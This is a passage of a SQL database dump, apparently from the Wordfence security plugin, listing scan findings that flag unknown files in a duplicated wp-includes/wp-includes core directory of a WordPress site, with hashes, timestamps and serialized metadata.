files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-dependency.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26742,1631424867,1631424867,'new','knownfile',75,'2b206fbdf7ff7823b95252b729bd2ebf','f35e0ef82702c264989ba8c18478651e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-editor.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-editor.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26743,1631424867,1631424867,'new','knownfile',75,'41e71671882c9581af1399d1ed8dd860','eb3e06397f43378e6b0e430bbf989723','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26744,1631424867,1631424867,'new','knownfile',75,'3d48380350d884d197234943fd3c3ee5','3443b8e777c11396ddd743efe9a41d29','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-error.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-error.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26745,1631424867,1631424867,'new','knownfile',75,'73dfaac430e5389ce19aa21cb3ccc093','3c89c647a7f536ad867b4580f3214688','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-fatal-error-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-fatal-error-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26746,1631424867,1631424867,'new','knownfile',75,'cb32ba686922aead28570c444f509d22','3825911a7c003cbd17b11d3b80a85126','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-feed-cache-transient.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/class-wp-feed-cache-transient.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26747,1631424867,1631424867,'new','knownfile',75,'a1482eb6d851c7c84a341a8d4a34b32e','7a6993fe2df1c8272226db50027b579f','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-feed-cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-feed-cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26748,1631424867,1631424867,'new','knownfile',75,'cb0d0db76feb51c8f392f503984e279d','d0763a0fa41399a5eda927724b2b7cb2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-hook.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-hook.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26749,1631424867,1631424867,'new','knownfile',75,'1df4138e7c197bdd2ceb2d992b88fbe7','d434dca383433b046f767b2b4065834e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-cookie.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/class-wp-http-cookie.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26750,1631424867,1631424867,'new','knownfile',75,'1bd9cd30a2c749dbe3faf4147e24c41e','8692d85d37d340fcd61b86362d7e29eb','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-curl.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-http-curl.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26751,1631424867,1631424867,'new','knownfile',75,'0d6eaa773ad70bbde25df574d17be7dd','5ae357a55508dd40bbfc9090cfc73df2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-encoding.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-http-encoding.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26752,1631424867,1631424867,'new','knownfile',75,'7d60a1fbe2939696666c55f9a63aede1','6802085a76a4e14cf802ebdad03d4610','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-ixr-client.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-http-ixr-client.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26753,1631424868,1631424868,'new','knownfile',75,'358d3bb8d33493e2edcb23f1869bfbaf','c3b20955ed3c325ba6aa28585e0a9f8c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-proxy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-http-proxy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26754,1631424868,1631424868,'new','knownfile',75,'9d8ee498ebd29ab404626597124d0d19','5498d0fba84822b59a2b21a9970f82b6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-requests-hooks.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-http-requests-hooks.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26755,1631424868,1631424868,'new','knownfile',75,'8bd773b75276d4189831ce0335ee3468','50c856ac6abc78569acc27cffdfbbba2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-requests-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/class-wp-http-requests-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26756,1631424868,1631424868,'new','knownfile',75,'e10e578616afea32bbdc6962b3cf7d22','bb920d039626bb400e693a0c42af6944','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-http-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26757,1631424868,1631424868,'new','knownfile',75,'b9f717440af28d6ff812df42a65f5993','ea84453fca5aefc70e1bab45bb41dc79','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-streams.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-http-streams.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26758,1631424868,1631424868,'new','knownfile',75,'df6f77369f69cb13d7cfc63791433c70','41e6e5afcd7dcf6406102fee571b954a','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor-gd.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-image-editor-gd.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26759,1631424868,1631424868,'new','knownfile',75,'44fb3d39038be6d416fdac2b5a4e425d','442574d7d0e4b389611c71a61a6d5ec6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor-imagick.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/class-wp-image-editor-imagick.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26760,1631424868,1631424868,'new','knownfile',75,'a2aefa53a9c092b8622cbe4327956df8','ed6e8cb6283c9088d90ea9e2c11af901','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-image-editor.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26761,1631424868,1631424868,'new','knownfile',75,'7ec8959fc438630ed6a7a3707b75c9a8','308a93c32c2cc14d795e3c05f9c19e7b','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-list-util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-list-util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26762,1631424868,1631424868,'new','knownfile',75,'b177d186faa1cd1a769fc76cc06451d9','05d7b9d140b77257170163e20176e757','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-locale-switcher.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-locale-switcher.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26763,1631424868,1631424868,'new','knownfile',75,'cfde21f414e2ffb424511455234d3987','359979f50d346e43ee57fdee473b7fee','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-locale.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-locale.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26764,1631424868,1631424868,'new','knownfile',75,'18029643af851ce8e76cfc557bd57ac8','d55f98f9575a5e43c7b1009ea43584d5','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-matchesmapregex.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-matchesmapregex.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26765,1631424868,1631424868,'new','knownfile',75,'725b32d3268994909f36a06733fcd8f4','29691773e1ac8f4d9d7a5d3e5af00000','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-meta-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-meta-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26766,1631424868,1631424868,'new','knownfile',75,'2f3e2950d064508606ebded6ab0a8dcd','c75353afa6242b9b5bffe3f0ba3ad138','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-metadata-lazyloader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-metadata-lazyloader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26767,1631424868,1631424868,'new','knownfile',75,'1ac2f1606a8b2c35a75787452a8db45c','ee49b615e44063af7b82ea4383b23eec','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-network-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-network-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26768,1631424868,1631424868,'new','knownfile',75,'e39b949c03a094b9aa8050478be14679','7c064be7e8c72f294bf6591d6e08ac9d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-network.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-network.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26769,1631424869,1631424869,'new','knownfile',75,'63af136bddfabfdc444f53d8e2fb9e09','264c60f61b096a825c349c292dd9f342','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-object-cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-object-cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26770,1631424869,1631424869,'new','knownfile',75,'64d177550f1712b383c8932cf0b66b89','d5c7bc88ac5bd083aed6a6cb56e01de6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-oembed-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-oembed-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26771,1631424869,1631424869,'new','knownfile',75,'c9f5f41189fb6a850250f842e8e8fe78','a2554eaf99bde245d60369f4b0dc9dc0','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-oembed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-oembed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26772,1631424869,1631424869,'new','knownfile',75,'3a307568b91c4c6d21d6b720caced651','86ea21b45a531ec807b8774ef4c85931','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-paused-extensions-storage.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-paused-extensions-storage.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26773,1631424869,1631424869,'new','knownfile',75,'1edebb36b535c614d9e7c7c094f19da8','ec56fa728c9cd676a05c14948e3d79c7','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-post-type.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-post-type.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26774,1631424869,1631424869,'new','knownfile',75,'ec6c6d4f3c1555e5a7b967aaa9b1e76b','f2fd3c08867fb69e5953f433ebf9ee9e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-post.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-post.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26775,1631424869,1631424869,'new','knownfile',75,'348f6eaed8b8199513e32b016e9b9d88','b195805576d759b527638dd78610e9be','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26776,1631424869,1631424869,'new','knownfile',75,'903c7b3f7f609ffe286ad3864d9e9fee','d190b80fa0cefda41c313f7669d269ad','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26777,1631424869,1631424869,'new','knownfile',75,'f7def5bb2a5c2be7e9c5c6405c24980b','b826b84d14531edd49a76d2bb94334df','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-email-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/class-wp-recovery-mode-email-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26778,1631424869,1631424869,'new','knownfile',75,'d6f11c12e3e68c19ee345f6aa843ae46','0640a7a4aac321f5d32276c038f0d8fc','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-key-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-recovery-mode-key-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26779,1631424869,1631424869,'new','knownfile',75,'991e7fd39daaa7012f07c3b34adeb88e','cfbd901aa4b92617376159f8511d9cb3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-link-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/class-wp-recovery-mode-link-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26780,1631424870,1631424870,'new','knownfile',75,'4a38afa8a6ab3dd4e520dda39552fedc','9c9a64813cad99e519804a65d26b6d41','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-recovery-mode.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26781,1631424870,1631424870,'new','knownfile',75,'7ea6497f4859a5b1c702aa81632a990b','05396246a9b04cd50be3c20cabe2e20f','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-rewrite.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" 